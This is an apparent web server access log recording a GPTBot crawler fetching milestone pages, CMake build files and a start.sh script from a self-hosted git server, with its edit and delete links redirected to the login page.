"/windpacer/windpacer/milestones?q=&sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8507] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" -[17/Feb/2026:15:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8505] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" -[17/Feb/2026:15:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8515] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" -[17/Feb/2026:15:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8504] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" -[17/Feb/2026:15:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8498] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" -[17/Feb/2026:15:42:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:15:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker" -[17/Feb/2026:15:42:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:15:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker" -[17/Feb/2026:15:42:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:15:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker" -[17/Feb/2026:15:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15159] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:15:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15112] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15113] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:42:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:15:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/README.md" -[17/Feb/2026:15:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:15:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13718] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13720] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:42:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9977] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21634] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21633] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15366] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13649] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15364] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13651] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:42:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21681] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21679] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15502] [Gzip 8.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" -[17/Feb/2026:15:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 